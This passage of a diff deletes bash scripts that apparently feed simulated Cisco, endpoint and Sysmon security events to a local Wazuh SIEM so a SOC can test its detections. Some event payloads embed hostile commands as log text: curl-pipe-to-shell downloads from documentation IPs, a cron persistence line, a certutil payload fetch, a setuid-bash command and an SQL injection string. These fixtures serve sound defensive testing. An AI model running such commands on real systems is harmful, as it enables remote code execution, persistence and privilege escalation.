-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-106023: Deny tcp src outside:${CISCO_SRC_IP}/51515 dst inside:${CISCO_DST_IP}/445 by access-group \"outside_access_in\" [0x0, 0x0] soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_asa_acl_deny severity=high"
74 
-}
75 
-
76 
-send_asa_vpn_auth_fail() {
77 
-  local eid
78 
-  eid="$(random_id)"
79 
-  emit_syslog "<166>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %ASA-4-113019: Group = RA-VPN, Username = ${CISCO_VPN_USER}, IP = ${CISCO_SRC_IP}, Session disconnected. Session Type: SSL, Duration: 0h:00m:01s, Bytes xmt: 0, Bytes rcv: 0, Reason: User Requested. soc_mvp_test=true vendor=cisco product=asa event_id=${eid} event_type=cisco_vpn_auth_fail severity=medium"
80 
-}
81 
-
82 
-send_ios_login_fail() {
83 
-  local eid
84 
-  eid="$(random_id)"
85 
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SEC_LOGIN-4-LOGIN_FAILED: Login failed [user: ${CISCO_ADMIN_USER}] [Source: ${CISCO_SRC_IP}] [localport: 22] [Reason: Login Authentication Failed] at 19:30:00 UTC Tue Feb 17 2026 soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_ios_login_fail severity=medium"
86 
-}
87 
-
88 
-send_ios_config_change() {
89 
-  local eid
90 
-  eid="$(random_id)"
91 
-  emit_syslog "<165>$(date '+%b %d %H:%M:%S') ${CISCO_DEVICE_HOST} %SYS-5-CONFIG_I: Configured from console by ${CISCO_ADMIN_USER} on vty0 ( ${CISCO_SRC_IP} ) soc_mvp_test=true vendor=cisco product=ios event_id=${eid} event_type=cisco_config_change severity=low"
92 
-}
93 
-
94 
-send_once() {
95 
-  case "${SCENARIO}" in
96 
-    asa_acl_deny)
97 
-      send_asa_acl_deny
98 
-      ;;
99 
-    asa_vpn_auth_fail)
100 
-      send_asa_vpn_auth_fail
101 
-      ;;
102 
-    ios_login_fail)
103 
-      send_ios_login_fail
104 
-      ;;
105 
-    ios_config_change)
106 
-      send_ios_config_change
107 
-      ;;
108 
-    all)
109 
-      send_asa_acl_deny
110 
-      send_asa_vpn_auth_fail
111 
-      send_ios_login_fail
112 
-      send_ios_config_change
113 
-      ;;
114 
-    *)
115 
-      echo "error: unknown scenario '${SCENARIO}'"
116 
-      echo "valid: asa_acl_deny | asa_vpn_auth_fail | ios_login_fail | ios_config_change | all"
117 
-      exit 1
118 
-      ;;
119 
-  esac
120 
-}
121 
-
122 
-if [[ "${FOREVER}" == "true" ]]; then
123 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
124 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
125 
-  while true; do
126 
-    send_once
127 
-    sleep "${DELAY}"
128 
-  done
129 
-else
130 
-  for ((i=1; i<=COUNT; i++)); do
131 
-    send_once
132 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
133 
-      sleep "${DELAY}"
134 
-    fi
135 
-  done
136 
-fi

+ 0 - 228
scripts/send-wazuh-endpoint-agent-test-events.sh
ファイルの表示 

@@ -1,228 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-PLATFORM="${1:-all}"      # windows | mac | linux | all
5 
-SCENARIO="${2:-all}"      # auth | process | persistence | privilege | malware | all
6 
-COUNT="1"
7 
-DELAY="0.3"
8 
-FOREVER="false"
9 
-DRY_RUN="${DRY_RUN:-0}"
10 
-COUNT_SET="false"
11 
-DELAY_SET="false"
12 
-
13 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
14 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
15 
-
16 
-WIN_HOST="${WIN_HOST:-win-client-01}"
17 
-MAC_HOST="${MAC_HOST:-mac-client-01}"
18 
-LINUX_HOST="${LINUX_HOST:-linux-client-01}"
19 
-SIM_USER="${SIM_USER:-jane.doe}"
20 
-
21 
-shift 2 || true
22 
-
23 
-while (($#)); do
24 
-  case "$1" in
25 
-    --forever)
26 
-      FOREVER="true"
27 
-      shift
28 
-      ;;
29 
-    *)
30 
-      if [[ "${COUNT_SET}" == "false" ]]; then
31 
-        COUNT="$1"
32 
-        COUNT_SET="true"
33 
-      elif [[ "${DELAY_SET}" == "false" ]]; then
34 
-        DELAY="$1"
35 
-        DELAY_SET="true"
36 
-      else
37 
-        echo "error: unexpected argument '$1'"
38 
-        echo "usage: scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds] [--forever]"
39 
-        exit 1
40 
-      fi
41 
-      shift
42 
-      ;;
43 
-  esac
44 
-done
45 
-
46 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
47 
-  echo "error: count must be a positive integer"
48 
-  exit 1
49 
-fi
50 
-
51 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
52 
-  echo "error: delay must be numeric (example: 0.5)"
53 
-  exit 1
54 
-fi
55 
-
56 
-emit_syslog() {
57 
-  local msg="$1"
58 
-  local sent="false"
59 
-
60 
-  if [[ "${DRY_RUN}" == "1" ]]; then
61 
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
62 
-    return 0
63 
-  fi
64 
-
65 
-  if command -v nc >/dev/null 2>&1; then
66 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
67 
-      sent="true"
68 
-    fi
69 
-  fi
70 
-
71 
-  if [[ "${sent}" != "true" ]]; then
72 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
73 
-      sent="true"
74 
-    fi
75 
-  fi
76 
-
77 
-  if [[ "${sent}" != "true" ]]; then
78 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
79 
-    return 1
80 
-  fi
81 
-
82 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
83 
-}
84 
-
85 
-rand_public_ip() {
86 
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
87 
-    echo "198.51.100.$((RANDOM % 240 + 10))"
88 
-  else
89 
-    echo "203.0.113.$((RANDOM % 240 + 10))"
90 
-  fi
91 
-}
92 
-
93 
-rand_private_ip() {
94 
-  echo "10.$((RANDOM % 20 + 10)).$((RANDOM % 200 + 1)).$((RANDOM % 240 + 10))"
95 
-}
96 
-
97 
-send_windows_auth() {
98 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_auth_fail severity=medium event_id=4625 account=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
99 
-}
100 
-
101 
-send_windows_process() {
102 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_suspicious_process severity=high event_id=4688 process=\"powershell.exe\" cmdline=\"powershell -enc <base64>\" parent=\"winword.exe\" user=\"${SIM_USER}\""
103 
-}
104 
-
105 
-send_windows_persistence() {
106 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_persistence_registry severity=high event_id=4657 registry_path=\"HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Updater\" user=\"${SIM_USER}\""
107 
-}
108 
-
109 
-send_windows_privilege() {
110 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_privilege_group_add severity=high event_id=4732 account=\"${SIM_USER}\" target_group=\"Administrators\""
111 
-}
112 
-
113 
-send_windows_malware() {
114 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${WIN_HOST} soc_mvp_test=true source=windows_agent platform=windows event_type=windows_malware_detected severity=high event_id=1116 engine=\"Defender\" threat=\"Trojan:Win32/AgentTesla\" path=\"C:\\\\Users\\\\${SIM_USER}\\\\AppData\\\\Local\\\\Temp\\\\invoice.exe\" action=\"quarantine\""
115 
-}
116 
-
117 
-send_mac_auth() {
118 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_auth_fail severity=medium subsystem=\"com.apple.loginwindow\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
119 
-}
120 
-
121 
-send_mac_process() {
122 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_suspicious_process severity=high process=\"osascript\" cmdline=\"osascript -e do shell script curl ...\" parent=\"Safari\" user=\"${SIM_USER}\""
123 
-}
124 
-
125 
-send_mac_persistence() {
126 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_launchagent_created severity=high plist=\"/Users/${SIM_USER}/Library/LaunchAgents/com.apple.updater.plist\" user=\"${SIM_USER}\""
127 
-}
128 
-
129 
-send_mac_privilege() {
130 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_privilege_escalation severity=high action=\"sudo\" user=\"${SIM_USER}\" tty=\"ttys001\" cmd=\"/bin/chmod +s /bin/bash\""
131 
-}
132 
-
133 
-send_mac_malware() {
134 
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') ${MAC_HOST} soc_mvp_test=true source=mac_agent platform=mac event_type=mac_xprotect_detected severity=high signature=\"OSX.Adload\" file=\"/Users/${SIM_USER}/Downloads/installer.pkg\" action=\"blocked\""
135 
-}
136 
-
137 
-send_linux_auth() {
138 
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_ssh_auth_fail severity=medium process=\"sshd\" user=\"${SIM_USER}\" src_ip=$(rand_public_ip) fail_count=$((RANDOM % 8 + 3))"
139 
-}
140 
-
141 
-send_linux_process() {
142 
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_suspicious_process severity=high process=\"curl\" cmdline=\"curl http://198.51.100.20/a.sh | bash\" user=\"${SIM_USER}\""
143 
-}
144 
-
145 
-send_linux_persistence() {
146 
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_cron_persistence severity=high file=\"/etc/cron.d/system-update\" user=\"root\" command=\"*/5 * * * * curl -fsSL http://203.0.113.20/s | sh\""
147 
-}
148 
-
149 
-send_linux_privilege() {
150 
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_sudo_privilege_escalation severity=high user=\"${SIM_USER}\" command=\"sudo usermod -aG sudo ${SIM_USER}\" src_ip=$(rand_private_ip)"
151 
-}
152 
-
153 
-send_linux_malware() {
154 
-  emit_syslog "<133>$(date '+%b %d %H:%M:%S') ${LINUX_HOST} soc_mvp_test=true source=linux_agent platform=linux event_type=linux_malware_detected severity=high scanner=\"clamav\" signature=\"Unix.Trojan.Mirai\" file=\"/tmp/kworkerd\" action=\"removed\""
155 
-}
156 
-
157 
-send_one_platform() {
158 
-  local p="$1"
159 
-  case "${SCENARIO}" in
160 
-    auth)
161 
-      "send_${p}_auth"
162 
-      ;;
163 
-    process)
164 
-      "send_${p}_process"
165 
-      ;;
166 
-    persistence)
167 
-      "send_${p}_persistence"
168 
-      ;;
169 
-    privilege)
170 
-      "send_${p}_privilege"
171 
-      ;;
172 
-    malware)
173 
-      "send_${p}_malware"
174 
-      ;;
175 
-    all)
176 
-      "send_${p}_auth"
177 
-      "send_${p}_process"
178 
-      "send_${p}_persistence"
179 
-      "send_${p}_privilege"
180 
-      "send_${p}_malware"
181 
-      ;;
182 
-    *)
183 
-      echo "error: unknown scenario '${SCENARIO}'"
184 
-      echo "valid: auth | process | persistence | privilege | malware | all"
185 
-      exit 1
186 
-      ;;
187 
-  esac
188 
-}
189 
-
190 
-send_once() {
191 
-  case "${PLATFORM}" in
192 
-    windows)
193 
-      send_one_platform "windows"
194 
-      ;;
195 
-    mac|macos)
196 
-      send_one_platform "mac"
197 
-      ;;
198 
-    linux)
199 
-      send_one_platform "linux"
200 
-      ;;
201 
-    all)
202 
-      send_one_platform "windows"
203 
-      send_one_platform "mac"
204 
-      send_one_platform "linux"
205 
-      ;;
206 
-    *)
207 
-      echo "error: unknown platform '${PLATFORM}'"
208 
-      echo "valid: windows | mac | linux | all"
209 
-      exit 1
210 
-      ;;
211 
-  esac
212 
-}
213 
-
214 
-if [[ "${FOREVER}" == "true" ]]; then
215 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
216 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
217 
-  while true; do
218 
-    send_once
219 
-    sleep "${DELAY}"
220 
-  done
221 
-else
222 
-  for ((i=1; i<=COUNT; i++)); do
223 
-    send_once
224 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
225 
-      sleep "${DELAY}"
226 
-    fi
227 
-  done
228 
-fi

File diff suppressed because it is too large
+ 0 - 217
scripts/send-wazuh-fortigate-continuous.sh


File diff suppressed because it is too large
+ 0 - 135
scripts/send-wazuh-fortigate-test-events.sh


+ 0 - 230
scripts/send-wazuh-proposal-appendix-b-events.sh
ファイルの表示 

@@ -1,230 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-# Usage:
5 
-#   scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
6 
-#
7 
-# selector:
8 
-#   all | b1 | b2 | b3 | <usecase_id>
9 
-#   example usecase_id: B1-01, B2-01, B3-06
10 
-
11 
-SELECTOR="${1:-all}"
12 
-COUNT="${2:-1}"
13 
-DELAY="${3:-0.3}"
14 
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15 
-DRY_RUN="${DRY_RUN:-0}"
16 
-FOREVER="false"
17 
-PROFILE="${PROFILE:-simulation}"
18 
-
19 
-for arg in "${@:4}"; do
20 
-  case "${arg}" in
21 
-    --forever)
22 
-      FOREVER="true"
23 
-      ;;
24 
-    --profile=*)
25 
-      PROFILE="${arg#*=}"
26 
-      ;;
27 
-    *)
28 
-      echo "error: unexpected argument '${arg}'"
29 
-      echo "usage: scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds] [--forever] [--profile=simulation|production]"
30 
-      exit 1
31 
-      ;;
32 
-  esac
33 
-done
34 
-
35 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
36 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
37 
-
38 
-VCENTER_HOST="${VCENTER_HOST:-vcenter-01}"
39 
-ESXI_HOST="${ESXI_HOST:-esxi-01}"
40 
-LOGMON_HOST="${LOGMON_HOST:-logmon-01}"
41 
-WIN_SYSMON_HOST="${WIN_SYSMON_HOST:-win-sysmon-01}"
42 
-SIM_USER="${SIM_USER:-jane.doe}"
43 
-
44 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
45 
-  echo "error: count must be a positive integer"
46 
-  exit 1
47 
-fi
48 
-
49 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
50 
-  echo "error: delay must be numeric"
51 
-  exit 1
52 
-fi
53 
-
54 
-if ! [[ "${EVENT_DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
55 
-  echo "error: EVENT_DELAY must be numeric"
56 
-  exit 1
57 
-fi
58 
-
59 
-if [[ "${PROFILE}" != "simulation" && "${PROFILE}" != "production" ]]; then
60 
-  echo "error: profile must be simulation or production"
61 
-  exit 1
62 
-fi
63 
-
64 
-rand_public_ip() {
65 
-  if [[ $((RANDOM % 2)) -eq 0 ]]; then
66 
-    echo "198.51.100.$((RANDOM % 240 + 10))"
67 
-  else
68 
-    echo "203.0.113.$((RANDOM % 240 + 10))"
69 
-  fi
70 
-}
71 
-
72 
-emit_syslog() {
73 
-  local msg="$1"
74 
-  local sent="false"
75 
-
76 
-  if [[ "${DRY_RUN}" == "1" ]]; then
77 
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
78 
-    return 0
79 
-  fi
80 
-
81 
-  if command -v nc >/dev/null 2>&1; then
82 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
83 
-      sent="true"
84 
-    fi
85 
-  fi
86 
-
87 
-  if [[ "${sent}" != "true" ]]; then
88 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
89 
-      sent="true"
90 
-    fi
91 
-  fi
92 
-
93 
-  if [[ "${sent}" != "true" ]]; then
94 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
95 
-    return 1
96 
-  fi
97 
-
98 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
99 
-}
100 
-
101 
-selector_matches() {
102 
-  local id="$1"
103 
-  local section="$2"
104 
-  local sel
105 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
106 
-  local idl
107 
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
108 
-  local sec
109 
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
110 
-
111 
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
112 
-}
113 
-
114 
-emit_b_usecase() {
115 
-  local id="$1"
116 
-  local section="$2"
117 
-  local severity="$3"
118 
-  local source="$4"
119 
-  local host="$5"
120 
-  local usecase="$6"
121 
-  local body="$7"
122 
-
123 
-  selector_matches "${id}" "${section}" || return 0
124 
-
125 
-  local tags
126 
-  if [[ "${PROFILE}" == "production" ]]; then
127 
-    tags="soc_mvp_test=true source=${source} severity=${severity}"
128 
-  else
129 
-    tags="soc_mvp_test=true source=${source} section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\""
130 
-  fi
131 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} ${tags} ${body}"
132 
-  sleep "${EVENT_DELAY}"
133 
-}
134 
-
135 
-emit_b1() {
136 
-  local sip
137 
-  sip="$(rand_public_ip)"
138 
-
139 
-  emit_b_usecase "B1-01" "B1" "high" "vmware" "${VCENTER_HOST}" \
140 
-    "vCenter GUI Login Failed 5 Times and Success 1 Time" \
141 
-    "event_type=vmware_vcenter_login_fail_success login_fail_count=5 login_success_count=1 user=\"${SIM_USER}\" src_ip=${sip}"
142 
-
143 
-  emit_b_usecase "B1-02" "B1" "medium" "vmware" "${ESXI_HOST}" \
144 
-    "ESXi Enable SSH on Hosts" \
145 
-    "event_type=vmware_esxi_enable_ssh action=enable service=ssh user=\"root\" host=\"${ESXI_HOST}\""
146 
-
147 
-  emit_b_usecase "B1-03" "B1" "high" "vmware" "${ESXI_HOST}" \
148 
-    "ESXi SSH Failed 5 Times and Success 1 Time" \
149 
-    "event_type=vmware_esxi_ssh_fail_success ssh_fail_count=5 ssh_success_count=1 user=\"root\" src_ip=${sip}"
150 
-}
151 
-
152 
-emit_b2() {
153 
-  emit_b_usecase "B2-01" "B2" "low" "log_monitor" "${LOGMON_HOST}" \
154 
-    "Log Monitor Logs Loss Detection" \
155 
-    "event_type=log_loss_detection missing_stream=firewall expected_eps=500 observed_eps=0 duration_seconds=180"
156 
-}
157 
-
158 
-emit_b3() {
159 
-  emit_b_usecase "B3-01" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
160 
-    "Sysmon LSASS Dumping" \
161 
-    "event_type=sysmon_lsass_dump event_id=10 process=procdump.exe target_process=lsass.exe user=\"${SIM_USER}\""
162 
-
163 
-  emit_b_usecase "B3-02" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
164 
-    "Sysmon SQL Injection" \
165 
-    "event_type=sysmon_sql_injection event_id=1 process=w3wp.exe url=\"/app/login.php?id=1%27%20OR%201=1--\""
166 
-
167 
-  emit_b_usecase "B3-03" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
168 
-    "Sysmon Webshell" \
169 
-    "event_type=sysmon_webshell event_id=11 file=\"C:\\\\inetpub\\\\wwwroot\\\\shell.aspx\" process=w3wp.exe"
170 
-
171 
-  emit_b_usecase "B3-04" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
172 
-    "Sysmon Uninstall" \
173 
-    "event_type=sysmon_security_agent_uninstall event_id=1 process=msiexec.exe cmdline=\"msiexec /x security-agent\" user=\"${SIM_USER}\""
174 
-
175 
-  emit_b_usecase "B3-05" "B3" "high" "windows_sysmon" "${WIN_SYSMON_HOST}" \
176 
-    "Sysmon LSASS Dumping by Task Manager" \
177 
-    "event_type=sysmon_lsass_dump_taskmgr event_id=10 process=taskmgr.exe target_process=lsass.exe action=create_dump"
178 
-
179 
-  emit_b_usecase "B3-06" "B3" "medium" "windows_sysmon" "${WIN_SYSMON_HOST}" \
180 
-    "Sysmon CertUtil Download" \
181 
-    "event_type=sysmon_certutil_download event_id=1 process=certutil.exe cmdline=\"certutil -urlcache -split -f http://198.51.100.22/payload.bin payload.bin\""
182 
-}
183 
-
184 
-emit_selected_set() {
185 
-  local sel
186 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
187 
-
188 
-  case "${sel}" in
189 
-    all)
190 
-      emit_b1
191 
-      emit_b2
192 
-      emit_b3
193 
-      ;;
194 
-    b1|b1-*)
195 
-      emit_b1
196 
-      ;;
197 
-    b2|b2-*)
198 
-      emit_b2
199 
-      ;;
200 
-    b3|b3-*)
201 
-      emit_b3
202 
-      ;;
203 
-    *)
204 
-      emit_b1
205 
-      emit_b2
206 
-      emit_b3
207 
-      ;;
208 
-  esac
209 
-}
210 
-
211 
-echo "starting proposal Appendix B log simulator"
212 
-echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s event_delay=${EVENT_DELAY}s dry_run=${DRY_RUN} profile=${PROFILE}"
213 
-echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
214 
-
215 
-if [[ "${FOREVER}" == "true" ]]; then
216 
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
217 
-  trap 'echo; echo "stopped"; exit 0' INT TERM
218 
-  while true; do
219 
-    emit_selected_set
220 
-    sleep "${DELAY}"
221 
-  done
222 
-else
223 
-  for ((i=1; i<=COUNT; i++)); do
224 
-    emit_selected_set
225 
-    if [[ "${i}" -lt "${COUNT}" ]]; then
226 
-      sleep "${DELAY}"
227 
-    fi
228 
-  done
229 
-  echo "done"
230 
-fi

+ 0 - 235
scripts/send-wazuh-proposal-appendix-c-events.sh
ファイルの表示 

@@ -1,235 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-# Usage:
5 
-#   scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]
6 
-#
7 
-# selector:
8 
-#   all | c1 | c2 | c3 | <usecase_id>
9 
-#   example usecase_id: C1-01, C2-03, C3-04
10 
-
11 
-SELECTOR="${1:-all}"
12 
-COUNT="${2:-1}"
13 
-DELAY="${3:-0.3}"
14 
-EVENT_DELAY="${EVENT_DELAY:-0.05}"
15 
-DRY_RUN="${DRY_RUN:-0}"
16 
-FOREVER="false"
17 
-
18 
-for arg in "${@:4}"; do
19 
-  case "${arg}" in
20 
-    --forever)
21 
-      FOREVER="true"
22 
-      ;;
23 
-    *)
24 
-      echo "error: unexpected argument '${arg}'"
25 
-      echo "usage: scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds] [--forever]"
26 
-      exit 1
27 
-      ;;
28 
-  esac
29 
-done
30 
-
31 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
32 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
33 
-VPN_HOST="${VPN_HOST:-fgt-vpn-01}"
34 
-WIN_HOST="${WIN_HOST:-win-ad-01}"
35 
-SIM_USER="${SIM_USER:-alice.admin}"
36 
-SIM_SERVICE_USER="${SIM_SERVICE_USER:-svc_backup}"
37 
-SIM_SRC_IP="${SIM_SRC_IP:-203.0.113.44}"
38 
-
39 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
40 
-  echo "error: count must be a positive integer"
41 
-  exit 1
42 
-fi
43 
-
44 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
45 
-  echo "error: delay must be numeric"
46 
-  exit 1
47 
-fi
48 
-
49 
-emit_syslog() {
50 
-  local msg="$1"
51 
-  local sent="false"
52 
-
53 
-  if [[ "${DRY_RUN}" == "1" ]]; then
54 
-    echo "[DRY_RUN $(date -u +'%Y-%m-%dT%H:%M:%SZ')] ${msg}"
55 
-    return 0
56 
-  fi
57 
-
58 
-  if command -v nc >/dev/null 2>&1; then
59 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
60 
-      sent="true"
61 
-    fi
62 
-  fi
63 
-
64 
-  if [[ "${sent}" != "true" ]]; then
65 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
66 
-      sent="true"
67 
-    fi
68 
-  fi
69 
-
70 
-  if [[ "${sent}" != "true" ]]; then
71 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
72 
-    return 1
73 
-  fi
74 
-
75 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
76 
-}
77 
-
78 
-selector_matches() {
79 
-  local id="$1"
80 
-  local section="$2"
81 
-  local sel
82 
-  sel="$(echo "${SELECTOR}" | tr '[:upper:]' '[:lower:]')"
83 
-  local idl
84 
-  idl="$(echo "${id}" | tr '[:upper:]' '[:lower:]')"
85 
-  local sec
86 
-  sec="$(echo "${section}" | tr '[:upper:]' '[:lower:]')"
87 
-  [[ "${sel}" == "all" || "${sel}" == "${sec}" || "${sel}" == "${idl}" ]]
88 
-}
89 
-
90 
-emit_c_usecase() {
91 
-  local id="$1"
92 
-  local section="$2"
93 
-  local severity="$3"
94 
-  local host="$4"
95 
-  local usecase="$5"
96 
-  local body="$6"
97 
-
98 
-  selector_matches "${id}" "${section}" || return 0
99 
-  emit_syslog "<182>$(date '+%b %d %H:%M:%S') ${host} soc_mvp_test=true source=windows section=${section} usecase_id=${id} severity=${severity} usecase=\"${usecase}\" ${body}"
100 
-  sleep "${EVENT_DELAY}"
101 
-}
102 
-
103 
-emit_c1() {
104 
-  # Two successful logins by same user with impossible travel profile
105 
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
106 
-    "Impossible Travel Detection" \
107 
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=203.150.10.10 country=TH src_lat=13.7563 src_lon=100.5018 dst_host=vpn-gw-01"
108 
-
109 
-  emit_c_usecase "C1-01" "C1" "high" "${VPN_HOST}" \
110 
-    "Impossible Travel Detection" \
111 
-    "event_type=vpn_login_success event_id=4624 success=true user=\"${SIM_USER}\" src_ip=8.8.8.8 country=US src_lat=37.3861 src_lon=-122.0839 dst_host=vpn-gw-01"
112 
-}
113 
-
114 
-emit_c2() {
115 
-  emit_c_usecase "C2-01" "C2" "high" "${WIN_HOST}" \
116 
-    "Privileged Account Usage Outside Business Hours" \
117 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"administrator\" is_admin=true src_ip=${SIM_SRC_IP} logon_type=10 dst_host=dc-01"
118 
-
119 
-  emit_c_usecase "C2-02" "C2" "medium" "${WIN_HOST}" \
120 
-    "Dormant Account Activation" \
121 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"legacy.user\" src_ip=198.51.100.55 dst_host=dc-01"
122 
-
123 
-  emit_c_usecase "C2-03" "C2" "high" "${WIN_HOST}" \
124 
-    "Service Account Interactive Logon" \
125 
-    "event_type=windows_auth_success event_id=4624 success=true user=\"${SIM_SERVICE_USER}\" account_type=service is_service=true logon_type=10 src_ip=198.51.100.66 dst_host=filesrv-01"
126 
-
127 
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
128 
-    "Rapid Privilege Escalation then Sensitive Access" \
129 
-    "event_type=windows_privilege_group_add event_id=4732 user=\"${SIM_USER}\" action=group_add is_admin=true src_ip=10.10.1.20 dst_host=dc-01"
130 
-
131 
-  emit_c_usecase "C2-04" "C2" "high" "${WIN_HOST}" \
132 
-    "Rapid Privilege Escalation then Sensitive Access" \
133 
